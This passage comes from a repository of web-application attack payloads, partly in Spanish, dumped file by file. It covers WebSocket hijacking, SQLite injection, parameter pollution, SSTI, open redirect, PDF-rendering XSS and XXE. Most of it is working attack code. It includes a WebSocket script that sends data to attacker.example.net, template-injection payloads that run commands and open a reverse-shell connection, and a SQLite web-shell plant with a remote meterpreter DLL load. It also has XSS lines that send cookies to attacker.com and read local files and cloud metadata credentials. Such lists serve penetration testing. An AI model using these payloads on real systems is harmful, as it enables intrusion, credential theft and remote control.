87 | 88 | ``` 89 | POST /refresh HTTP/1.1 90 | Host: victim.example:8090 91 | Content-Type: application/x-www-form-urlencoded 92 | Content-Length: 0 93 | ``` 94 | -------------------------------------------------------------------------------- /Web Application/Web Sockets/README.md: -------------------------------------------------------------------------------- 1 | # Web Sockets 2 | 3 | The WebSocket protocol provides bidirectional, full-duplex communication. 4 | 5 | WebSockets are a bi-directional, full duplex communications protocol initiated over HTTP between a client and a server. They are commonly used in modern web applications for streaming data and other asynchronous traffic. 6 | 7 | WebSocket connections are normally created using client-side JavaScript like the following: 8 | 9 | ``` 10 | var ws = new WebSocket("wss://normal-website.com/chat"); 11 | ``` 12 | 13 | To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser issues a WebSocket handshake request like the following: 14 | 15 | ``` 16 | GET /chat HTTP/1.1 17 | Host: normal-website.com 18 | Sec-WebSocket-Version: 13 19 | Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w== 20 | Connection: keep-alive, Upgrade 21 | Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2 22 | Upgrade: websocket 23 | ``` 24 | 25 | If the server accepts the connection, it returns a WebSocket handshake response like the following: 26 | 27 | ``` 28 | HTTP/1.1 101 Switching Protocols 29 | Connection: Upgrade 30 | Upgrade: websocket 31 | Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk= 32 | ``` 33 | 34 | Several features of the WebSocket handshake messages are worth noting: 35 | 36 | - The `Connection` and `Upgrade` headers in the request and response indicate that this is a WebSocket handshake. 37 | - The `Sec-WebSocket-Version` request header specifies the WebSocket protocol version that the client wishes to use. This is typically 13. 
38 | - The `Sec-WebSocket-Key` request header contains a base64-encoded random value, which should be randomly generated in each handshake request. 39 | - The `Sec-WebSocket-Accept` response header contains a hash of the value submitted in the `Sec-WebSocket-Key` request header, concatenated with a specific string defined in the protocol specification. This is done to prevent misleading responses resulting from misconfigured servers or caching proxies. 40 | 41 | ## Secuestro de WebSocket entre sitios (CSWSH) 42 | 43 | Si el protocolo de enlace de WebSocket no está protegido correctamente mediante un token CSRF o un `nonce`, es posible utilizar el WebSocket autenticado de un usuario en el sitio controlado por un atacante porque el navegador envía automáticamente las cookies. Este ataque se denomina Secuestro de WebSocket entre sitios (CSWSH). 44 | 45 | Ejemplo de explotación, alojada en el servidor de un atacante, que filtra los datos recibidos del WebSocket al atacante: 46 | 47 | ``` 48 | <script> 49 | ws = new WebSocket('wss://vulnerable.example.com/messages'); 50 | ws.onopen = function start(event) { 51 | websocket.send("HELLO"); 52 | } 53 | ws.onmessage = function handleReply(event) { 54 | fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'}); 55 | } 56 | ws.send("Some text sent to the server"); 57 | </script> 58 | ``` 59 | 60 | Debe ajustar el código a su situación exacta. Por ejemplo, si su aplicación web utiliza un encabezado `Sec-WebSocket-Protocol` en la solicitud de protocolo de enlace, debe agregar este valor como un segundo parámetro a la llamada `WebSocket` para agregar este encabezado. 
61 | -------------------------------------------------------------------------------- /Web Application/Fuzzing/README.md: -------------------------------------------------------------------------------- 1 | # Fuzzing 2 | 3 | ## Summary 4 | - [Lists](#lists) 5 | - [users and passwords](#users-and-passwords) 6 | - [seclist](#seclist) 7 | - [Intruder Attacks](#intruder-attacks) 8 | - [Dirb](#dirb) 9 | - [ffuf](#ffuf) 10 | - [x8](#x8) 11 | 12 | 13 | 14 | ## Lists 15 | 16 | ### Users and Passwords 17 | 18 | https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials 19 | 20 | ### SecList: 21 | 22 | https://github.com/danielmiessler/SecLists 23 | 24 | ### Intruder Attacks 25 | 26 | - Sniper: Utiliza una única lista de carga útil; Reemplaza una posición a la vez; 27 | - Battering RAM: Utiliza una única lista de carga útil; Reemplaza todas las posiciones al mismo tiempo 28 | - Pitchfork: Cada posición tiene una lista de carga útil correspondiente; Entonces si hay dos posiciones a modificar, cada una obtiene su propia lista de carga útil. 29 | - Cluster Bomb: Utiliza cada lista de carga útil y diferentes combinaciones para cada posición. 30 | 31 | ## Dirb 32 | ``` 33 | dirb https://vulnerable.com/ /your/wordlist/path/ 34 | ``` 35 | 36 | ## ffuf 37 | 38 | ### Con extensiones 39 | ```sh 40 | ffuf -w g0ld3n.txt -u https://vulnerable.com/FUZZ -e .txt,.php,.sh,.py,.aspx,.asp,.php 41 | ``` 42 | 43 | ### Con subdirectorios y una profundidad de 2 subdirectorios para buscar 44 | ```sh 45 | ffuf -w g0ld3n.txt -u https://vulnerable.com/FUZZ -e .txt,.php,.sh,.py,.aspx,.asp,.php -recursion -recursion-depth 2 46 | ``` 47 | 48 | ### Descubrir subdominios 49 | 50 | Esta herramienta es capaz de encontrar subdominios sin registros DNS a velocidades ultrarrápidas. 51 | 52 | La herramienta utiliza el encabezado de `Host` en una solicitud HTTP para buscar subdominios. 53 | 54 | La bandera `-H` se usa para especificar encabezados de solicitud HTTP. 
Tenga en cuenta que se permiten varias banderas -H. 55 | ``` 56 | ffuf -w subdomains.txt -u https://vulnerable.com/ -H "Host: FUZZ.vulnerable.com" 57 | ``` 58 | 59 | Si la herramienta proporciona muchos subdominios como salida y la mayoría de ellos no están presentes en la realidad, se pueden utilizar las opciones de filtro que ofrece la herramienta. 60 | 61 | ### Cambio de Método HTTP 62 | ``` 63 | ffuf -w wordlist_api/g0ld3n-api.txt -u https://vulnerable.com/FUZZ -e .txt,.php,.sh,.py,.aspx,.asp -recursion --fw=51 -recursion-depth 2 -H 'Authorization: Bearer JWT' -X POST 64 | ``` 65 | 66 | ### Discover the Parameter of a Web Shell on a Web Server 67 | 68 | ``` 69 | ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://sec03.rentahacker.htb/shell.php?FUZZ=id 70 | ``` 71 | 72 | *Reference: [Scavenger from Hack the Box](https://0xdf.gitlab.io/2020/02/29/htb-scavenger.html)* 73 | 74 | ### Send Parameter via POST 75 | ``` 76 | ffuf -w g0ld3n-api.txt -u https://vulnerable.com/api/endpoint -X POST --data '{"param1":value1,"param2":value2}' -H 'Authorization: Bearer JWT' 77 | ``` 78 | 79 | ### All Responses Status Code 80 | 81 | Capture all responses except "403" by combining `-mc all` (match all HTTP status codes) with `--fc=403` (filter out responses with status code 403): 82 | 83 | ``` 84 | ffuf -w g0ld3n-api.txt -u https://vulnerable.com/api/endpoint --fc=403 -mc all 85 | ``` 86 | 87 | ## x8 88 | 89 | Send parameters via the query string: 90 | ``` 91 | x8 -u "https://example.com/" -w <wordlist> 92 | ``` 93 | 94 | With some default parameters: 95 | ``` 96 | x8 -u "https://example.com/?something=1" -w <wordlist> 97 | ``` 98 | 99 | `/?something=1` is equivalent to `/?something=1&%s` 100 | 101 | Send parameters via the body: 102 | ``` 103 | x8 -u "https://example.com/" -X POST --as-body -w <wordlist> 104 | ``` 105 | 106 | Or with a custom body: 107 | ``` 108 | x8 -u "https://example.com/" -X POST --as-body -b '{"x":{%s}}' -w <wordlist> 109 | ``` 110 | 111 | `%s` will be replaced with different parameters like `{"x":{"a":"b3a1a", 
"b":"ce03a", ...}}` 112 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/SQLite Injection.md: -------------------------------------------------------------------------------- 1 | # SQLite Injection 2 | 3 | ## Summary 4 | 5 | * [SQLite comments](#sqlite-comments) 6 | * [SQLite version](#sqlite-version) 7 | * [Integer/String based - Extract table name](#integerstring-based---extract-table-name) 8 | * [Integer/String based - Extract column name](#integerstring-based---extract-column-name) 9 | * [Boolean - Count number of tables](#boolean---count-number-of-tables) 10 | * [Boolean - Enumerating table name](#boolean---enumerating-table-name) 11 | * [Boolean - Extract info](#boolean---extract-info) 12 | * [Extract Password of Current User](#extract-password-of-current-user) 13 | * [Time based](#time-based) 14 | * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) 15 | * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) 16 | 17 | 18 | ## SQLite comments 19 | 20 | ```sql 21 | -- 22 | /**/ 23 | ``` 24 | 25 | ## SQLite version 26 | 27 | ```sql 28 | select sqlite_version(); 29 | ``` 30 | 31 | ```sql 32 | username=")) UNION+SELECT 1,sqlite_version(),3,4-- 33 | ``` 34 | 35 | ## Integer/String based - Extract table name 36 | 37 | ```sql 38 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' 39 | ``` 40 | 41 | ```sql 42 | username=")) UNION SELECT 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- - 43 | ``` 44 | 45 | Use limit X+1 offset X, to extract all tables. 
46 | 47 | ## Integer/String based - Extract column name 48 | 49 | ```sql 50 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' 51 | ``` 52 | 53 | ```sql 54 | username=")) UNION SELECT 1,sql,3,4 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='<table>'-- - 55 | ``` 56 | 57 | For a clean output 58 | 59 | ```sql 60 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' 61 | ``` 62 | 63 | ## Boolean - Count number of tables 64 | 65 | ```sql 66 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table 67 | ``` 68 | 69 | ## Boolean - Enumerating table name 70 | 71 | ```sql 72 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number 73 | ``` 74 | 75 | ## Boolean - Extract info 76 | 77 | ```sql 78 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') 79 | ``` 80 | 81 | ## Extract Password of Current User 82 | 83 | ```sql 84 | username="))+union+select+username,+password,+3,+4+from+users+limit+1+-- 85 | ``` 86 | 87 | ## Time based 88 | 89 | ```sql 90 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 91 | ``` 92 | 93 | ## Remote Command Execution using SQLite command - Attach Database 94 | 95 | ```sql 96 | ATTACH DATABASE '/var/www/lol.php' AS lol; 97 | CREATE TABLE lol.pwn (dataz text); 98 | INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');-- 99 | 
``` 100 | 101 | ## Remote Command Execution using SQLite command - Load_extension 102 | 103 | ```sql 104 | UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 105 | ``` 106 | 107 | Note: `load_extension` is disabled by default. 108 | -------------------------------------------------------------------------------- /Web Application/HTTP Parameter Pollution/README.md: -------------------------------------------------------------------------------- 1 | # HTTP Parameter Pollution 2 | 3 | *** 4 | 5 | ## Summary 6 | 7 | - [Detection](#detection) 8 | - [Server Side HPP](#server-side-hpp) 9 | - [Client Side HPP](#client-side-hpp) 10 | - [Email HPP](#email-hpp) 11 | - [Social Sharing Buttons](#social-sharing-buttons) 12 | 13 | *** 14 | 15 | ## Detection 16 | 17 | When a request contains multiple values for the same parameter, there are three possibilities: 18 | 19 | 1. The method returns the first value of the parameter. 20 | 2. It returns the last value. 21 | 3. It returns a combination of all values. 22 | 23 | The following table illustrates how different web technologies behave in the presence of multiple occurrences of the same HTTP parameter. 
24 | 25 | Given the URL and querystring: `http://example.com/?color=red&color=blue` 26 | 27 | | Web Application Server Backend | Parsing Result | Example | 28 | | --- | --- | --- | 29 | | ASP.NET / IIS | All occurrences concatenated with a comma | color=red,blue | 30 | | ASP / IIS | All occurrences concatenated with a comma | color=red,blue | 31 | | .NET Core 3.1 / Kestrel | All occurrences concatenated with a comma | color=red,blue | 32 | | .NET 5 / Kestrel | All occurrences concatenated with a comma | color=red,blue | 33 | | PHP / Apache | Last occurrence only | color=blue | 34 | | PHP / Zeus | Last occurrence only | color=blue | 35 | | JSP, Servlet / Apache Tomcat | First occurrence only | color=red | 36 | | JSP, Servlet / Oracle Application Server 10g | First occurrence only | color=red | 37 | | JSP, Servlet / Jetty | First occurrence only | color=red | 38 | | IBM Lotus Domino | Last occurrence only | color=blue | 39 | | IBM HTTP Server | First occurrence only | color=red | 40 | | node.js / express | First occurrence only | color=red | 41 | | mod_perl, libapreq2 / Apache | First occurrence only | color=red | 42 | | Perl CGI / Apache | First occurrence only | color=red | 43 | | mod_wsgi (Python) / Apache | First occurrence only | color=red | 44 | | Python / Zope | All occurrences in List data type | color=\[‘red’,’blue’\] | 45 | 46 | *** 47 | 48 | ## Server Side HPP 49 | 50 | An attacker could try adding a second `from` parameter to trick the server; depending on which occurrence the server uses, the transfer would then be made from an account that is not owned by the attacker. 51 | 52 | Normal: 53 | ``` 54 | https://example.com/transfer?from=1377&to=1234&amount=5000 55 | ``` 56 | 57 | Exploited: 58 | ``` 59 | https://example.com/transfer?from=1377&to=1234&amount=5000&from=1338 60 | ``` 61 | 62 | *** 63 | 64 | ## Client Side HPP 65 | 66 | An attacker could add another "candidate" parameter and send the resulting URL to the victim. 
When the victim opens the URL, it does not matter which candidate they choose: the vote will always be counted for "green". 67 | 68 | Normal: 69 | 70 | ``` 71 | http://example.com/votation?candidate=green&vote=1 72 | ``` 73 | 74 | Exploited: 75 | 76 | ``` 77 | http://example.com/votation?candidate=green&vote=1%26candidate=black 78 | ``` 79 | 80 | ### Email HPP 81 | 82 | ``` 83 | email=victim@example.com&email=attacker@example.com 84 | ``` 85 | 86 | ### Social Sharing Buttons 87 | 88 | Find an article or blog post on the target website that has links to share it on social networks such as Facebook, Twitter, etc. 89 | 90 | Let's say we have an article with the URL: 91 | ``` 92 | https://vulnerable.com/blog/my-poc-hpp 93 | ``` 94 | 95 | Then append the payload to it: 96 | ``` 97 | ?&u=https://[attacker.com]/ok&text=another_site:https://[attacker.com]/ok 98 | ``` 99 | 100 | So our URL becomes: 101 | ``` 102 | https://vulnerable.com/blog/my-poc-hpp?&u=https://[attacker.com]/ok&text=another_site:https://[attacker.com]/ok 103 | ``` 104 | 105 | Now open the above URL and click the social-media share button. Check whether the shared content includes our payload `https://[attacker.com]/`. 106 | 107 | If you send this link to a user and they share it on Facebook, the shared content will be altered. 
108 | 109 | -------------------------------------------------------------------------------- /Web Application/SSTI/Intruder/ssti.fuzz.txt: -------------------------------------------------------------------------------- 1 | ${{<%[%'"}}%\ 2 | <%=+7*7+%> 3 | <%25%3d+7*7+%25> 4 | ${7*7} 5 | {{7*7}} 6 | parameter=user.first_name}}{{7*7}} 7 | {%+debug%} 8 | {%25+debug+%25} 9 | #{1+1} 10 | {{7*'7'}} 11 | ${3*3} 12 | {{ someString.toUPPERCASE() }} 13 | [[5*5]] 14 | {{'a'.toUpperCase()}} 15 | @(1+2) 16 | {{4*4}}[[5*5]] 17 | {{7*7}} 18 | {{7*'7'}} 19 | <%= 7 * 7 %> 20 | ${3*3} 21 | ${{7*7}} 22 | @(1+2) 23 | #{3*3} 24 | #{ 7 * 7 } 25 | {{dump(app)}} 26 | {{app.request.server.all|join(',')}} 27 | {{config.items()}} 28 | {{ [].class.base.subclasses() }} 29 | {{''.class.mro()[1].subclasses()}} 30 | {{ ''.__class__.__mro__[2].__subclasses__() }} 31 | {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %} 32 | {{'a'.toUpperCase()}} 33 | {{ request }} 34 | {{self}} 35 | <%= File.open('/etc/passwd').read %> 36 | <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} 37 | [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} 38 | ${"freemarker.template.utility.Execute"?new()("id")} 39 | {{app.request.query.filter(0,0,1024,{'options':'system'})}} 40 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} 41 | {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} 42 | {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} 43 | {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 44 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} 45 | {$smarty.version} 46 | {php}echo `id`;{/php} 47 | {{['id']|filter('system')}} 48 | 
{{['cat\x20/etc/passwd']|filter('system')}} 49 | {{['cat$IFS/etc/passwd']|filter('system')}} 50 | {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} 51 | {{request|attr(["_"*2,"class","_"*2]|join)}} 52 | {{request|attr(["__","class","__"]|join)}} 53 | {{request|attr("__class__")}} 54 | {{request.__class__}} 55 | {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} 56 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} 57 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} 58 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} 59 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} 60 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} 61 | ${T(java.lang.System).getenv()} 62 | ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} 63 | 
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} -------------------------------------------------------------------------------- /Web Application/Open Redirect/README.md: -------------------------------------------------------------------------------- 1 | # Open Redirect 2 | 3 | Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. 
4 | 5 | *** 6 | 7 | ## Summary 8 | - [30X HTTP Status](#30x-http-status) 9 | - [Detection](#detection) 10 | - [Open Redirect to XSS](#open-redirect-to-xss) 11 | - [Vulnerable Params](#vulnerable-params) 12 | 13 | *** 14 | 15 | ## 30X HTTP Status 16 | 17 | - [300 Multiple Choices](https://httpstatuses.com/300) 18 | - [301 Moved Permanently](https://httpstatuses.com/301) 19 | - [302 Found](https://httpstatuses.com/302) 20 | - [303 See Other](https://httpstatuses.com/303) 21 | - [304 Not Modified](https://httpstatuses.com/304) 22 | - [305 Use Proxy](https://httpstatuses.com/305) 23 | - [307 Temporary Redirect](https://httpstatuses.com/307) 24 | - [308 Permanent Redirect](https://httpstatuses.com/308) 25 | 26 | *** 27 | 28 | ## Detection 29 | 30 | ``` 31 | https://vulnerable.com/signup?redirectUrl=https://attacker.com/account 32 | ``` 33 | ``` 34 | http://vulnerable.com//bing.com 35 | ``` 36 | ``` 37 | http://vulnerable.com//www.bing.com 38 | ``` 39 | ``` 40 | http://vulnerable.com//bing.com/%2e%2e 41 | ``` 42 | ``` 43 | http://vulnerable.com/auth/login?redirect=/%5Cbing.com 44 | ``` 45 | ``` 46 | https://www.vulnerable.com.attacker.com/ 47 | www.vulnerable.com.attacker.com/ 48 | ``` 49 | ``` 50 | https:bing.com 51 | ``` 52 | ``` 53 | https://vulnerable.com\/\/google.com/ 54 | https://vulnerable.com/\/google.com/ 55 | ``` 56 | ``` 57 | https://vulnerable.com/?redirectUrl=\/\/google.com/ 58 | https://vulnerable.com/?redirectUrl=\/google.com/ 59 | ``` 60 | ``` 61 | https://vulnerable.com/?redirect=google。com 62 | ``` 63 | ``` 64 | https://vulnerable.com//google%E3%80%82com 65 | ``` 66 | ``` 67 | https://vulnerable.com//google%00.com 68 | ``` 69 | ``` 70 | https://vulnerable.com/?next=whitelisted.com&next=google.com 71 | ``` 72 | ``` 73 | http://www.vulnerable.com@bing.com/ 74 | ``` 75 | ``` 76 | http://www.vulnerable.com?http://www.bing.com/ 77 | http://www.vulnerable.com?folder/www.bing.com 78 | ``` 79 | ``` 80 | https://attacker.c℀.vulnerable.com . 
---> https://attacker.ca/c.vulnerable.com 81 | ``` 82 | 83 | *** 84 | 85 | ## Open Redirect to XSS 86 | 87 | ### If it's in a JS variable: 88 | 89 | ``` 90 | ";alert(0);// 91 | ``` 92 | 93 | ### From `data://` wrapper: 94 | 95 | ``` 96 | http://www.vulnerable.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== 97 | ``` 98 | 99 | ### From `javascript://` wrapper: 100 | 101 | ``` 102 | http://www.vulnerable.com/redirect.php?url=javascript:prompt(1) 103 | ``` 104 | 105 | *** 106 | 107 | ## Vulnerable Params 108 | 109 | Replace `replaceme.com` in *openRedirectPayloads.txt* with the specific whitelisted domain of your test case. 110 | ``` 111 | sed 's/replaceme.com/[yourVictimOrDomain].com/' openRedirectPayloads.txt > [vulnerable].txt 112 | ``` 113 | 114 | Mirar las peticiones 3XX en BurpSuite: 115 | 116 | ``` 117 | /{payload} 118 | ?next={payload} 119 | ?target={payload} 120 | ?rurl={payload} 121 | ?dest={payload} 122 | ?destination={payload} 123 | ?redir={payload} 124 | ?redirect_uri={payload} 125 | ?redirect_url={payload} 126 | ?redirect={payload} 127 | /redirect/{payload} 128 | /cgi-bin/redirect.cgi?{payload} 129 | /out/{payload} 130 | /out?{payload} 131 | ?view={payload} 132 | /login?to={payload} 133 | ?image_url={payload} 134 | ?go={payload} 135 | ?return={payload} 136 | ?returnTo={payload} 137 | ?return_to={payload} 138 | ?checkout_url={payload} 139 | ?continue={payload} 140 | ?return_path={payload} 141 | ``` 142 | 143 | Add `http://example.com/{payloads}` or `http://example.com/?paramPotentialVuln={payloads}` and test for open redirection with `Intruder` + `payloads.txt`. 
144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/server-side-xss-dynamic-pdf.md: -------------------------------------------------------------------------------- 1 | # Server Side XSS \(Dynamic PDF\) 2 | 3 | ## Server Side XSS \(Dynamic PDF\) 4 | 5 | If a web page is creating a PDF using user-controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**. 6 | So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**. 7 | 8 | Please note that the `<script><\script>` tags don't always work, so you will need a different method to execute JS \(for example, abusing `<img` \). 9 | Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** \(using `document.write()` for example\). But if you **cannot see** the created PDF, you will probably need to **extract the information by making web requests to a server you control** \(blind\). 
10 | 11 | ## Payloads 12 | 13 | ### Discovery 14 | 15 | ```markup 16 | <!-- Basic discovery, Write "test"--> 17 | <img src="x" onerror="document.write('test')" /> 18 | 19 | <!--Basic blind discovery, load a resource--> 20 | <img src="http://attacker.com"/> 21 | <img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie"> 22 | <script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script> 23 | <link rel=attachment href="http://attacker.com"> 24 | ``` 25 | 26 | ### Path disclosure 27 | 28 | ```markup 29 | <!-- If the bot is accessing a file:// path, you will discover the internal path 30 | if not, you will at least have wich path the bot is accessing --> 31 | <img src="x" onerror="document.write(window.location)" /> 32 | <script> document.write(window.location) </script> 33 | ``` 34 | 35 | ### Load an external script 36 | 37 | The most convenient way to exploit this vulnerability is to make the bot load a script hosted on a server you control. Then you can change the payload on your side and have the bot load it with the same injected code every time. 
38 | 39 | ```markup 40 | <script src="http://attacker.com/myscripts.js"></script> 41 | <img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/> 42 | ``` 43 | 44 | ### Read local file 45 | 46 | ```markup 47 | <script> 48 | x=new XMLHttpRequest; 49 | x.onload=function(){document.write(btoa(this.responseText))}; 50 | x.open("GET","file:///etc/passwd");x.send(); 51 | </script> 52 | ``` 53 | 54 | ```markup 55 | <iframe src=file:///etc/passwd></iframe> 56 | <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> 57 | <link rel=attachment href="file:///root/secret.txt"> 58 | <object data="file:///etc/passwd"> 59 | <portal src="file:///etc/passwd" id=portal> 60 | ``` 61 | 62 | ### Get external web page response as attachment \(metadata endpoints\) 63 | 64 | ```markup 65 | <link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/"> 66 | ``` 67 | 68 | ### Bot delay 69 | 70 | ```markup 71 | <!--Make the bot send a ping every 500ms to check how long does the bot wait--> 72 | <script> 73 | let time = 500; 74 | setInterval(()=>{ 75 | let img = document.createElement("img"); 76 | img.src = `https://attacker.com/ping?time=${time}ms`; 77 | time += 500; 78 | }, 500); 79 | </script> 80 | <img src="https://attacker.com/delay"> 81 | ``` 82 | 83 | ### Port Scan 84 | 85 | ```markup 86 | <!--Scan local port and receive a ping indicating which ones are found--> 87 | <script> 88 | const checkPort = (port) => { 89 | fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => { 90 | let img = document.createElement("img"); 91 | img.src = `http://attacker.com/ping?port=${port}`; 92 | }); 93 | } 94 | 95 | for(let i=0; i<1000; i++) { 96 | checkPort(i); 97 | } 98 | </script> 99 | <img src="https://attacker.com/startingScan"> 100 | ``` 101 | 102 | ### [SSRF](../SSRF/README.md) 103 | 104 | This vulnerability can be transformed very easily in a SSRF \(as you can make 
the script load external resources\). So just try to exploit it \(read some metadata?\). 105 | 106 | ## References 107 | 108 | {% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %} 109 | 110 | {% embed url="https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/" %} 111 | 112 | {% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %} 113 | -------------------------------------------------------------------------------- /Web Application/XXE/Intruder/XXE_Fuzzing.txt: -------------------------------------------------------------------------------- 1 | <?xml version="1.0" encoding="ISO-8859-1"?> 2 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 3 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 4 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 5 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><test></test> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> 10 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> 11 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 12 | <?xml version="1.0" 